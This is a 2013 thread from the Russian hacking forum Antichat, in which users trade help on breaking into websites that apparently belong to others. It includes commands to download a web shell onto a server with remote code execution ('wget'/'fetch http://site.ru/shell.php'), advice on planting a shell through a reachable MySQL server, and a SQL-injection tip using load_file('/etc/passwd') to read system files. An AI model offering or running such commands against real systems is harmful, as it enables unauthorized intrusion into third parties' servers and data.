HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.06.2013, 09:58
z0mbie86
Новичок
Регистрация: 25.07.2009
Сообщений: 10
С нами: 8840513

Репутация: 0
По умолчанию

В web.config нашел такую строчку

Как подключится? Я так понял через клиент oracle, если да то где скачать клиент и как подключится?
 
Ответить с цитированием

  #2  
Старый 05.06.2013, 14:04
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию

Есть сайт mysql для которого установлен на другом сервере, к нему есть доступ. Можно ли залить как ни будь шелл через него?
 
Ответить с цитированием

  #3  
Старый 05.06.2013, 15:26
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию

Цитата:
Сообщение от Br@!ns  
Есть сайт mysql для которого установлен на другом сервере, к нему есть доступ. Можно ли залить как ни будь шелл через него?
ну да, как и всегда стандартыми методами
 
Ответить с цитированием

  #4  
Старый 05.06.2013, 17:21
Ups
Участник форума
Регистрация: 11.04.2011
Сообщений: 113
С нами: 7941206

Репутация: 0
По умолчанию

Нашел сайт с RCE.

Ввожу: wget http://site.ru/shell.php

Выдает:

Цитата:
Сообщение от None  
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@mail.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
С curl'ом такая же проблема.

Если написать просто wget:

Цитата:
Сообщение от None  
Usage: wget [OPTION..и т.д
Остальные команды (rm\ls -la\etc) выполняет нормально.

Могу создавать файлы. Правда если:

echo > 1.php

то:

500 Internal Server Error
 
Ответить с цитированием

  #5  
Старый 05.06.2013, 18:20
z0mbie86
Новичок
Регистрация: 25.07.2009
Сообщений: 10
С нами: 8840513

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
Программа
Navicat Premium


вот такую ошибку выдает
 
Ответить с цитированием

  #6  
Старый 05.06.2013, 20:16
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от Ups  
Нашел сайт с RCE.
Ввожу: wget http://site.ru/shell.php
Выдает:
С curl'ом такая же проблема.
Если написать просто wget:
Остальные команды (rm\ls -la\etc) выполняет нормально.
Могу создавать файлы. Правда если:
echo > 1.php
то:
500 Internal Server Error
echo "" > 1.php

и убедись, что есть права на запись.
 
Ответить с цитированием

  #7  
Старый 05.06.2013, 20:32
Ups
Участник форума
Регистрация: 11.04.2011
Сообщений: 113
С нами: 7941206

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
попробуй через
fetch
Код:
fetch http://site.ru/shell.php
Выполнилось..но и ничего не закачалось.
 
Ответить с цитированием

  #8  
Старый 05.06.2013, 20:55
Ups
Участник форума
Регистрация: 11.04.2011
Сообщений: 113
С нами: 7941206

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
скинь в ЛС помогу, или в icq мне напиши но скорее всего нет прав,
проверить можно указав пути
Пример
system("cd /tmp/;ls -al");
Код:
ls -al /tmp/
Fatal error: Allowed memory size of 50331648 bytes exhausted (tried to allocate 700 bytes)

В аську отписал.
 
Ответить с цитированием

  #9  
Старый 06.06.2013, 00:45
stan_q
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами: 8830468

Репутация: 0
По умолчанию

Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается? Логи не открываются, видимо, нет прав на чтение.
 
Ответить с цитированием

  #10  
Старый 06.06.2013, 00:50
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от stan_q  
Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается?
load_file('/etc/passwd')

так иногда можно через скулю путь посмотреть
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...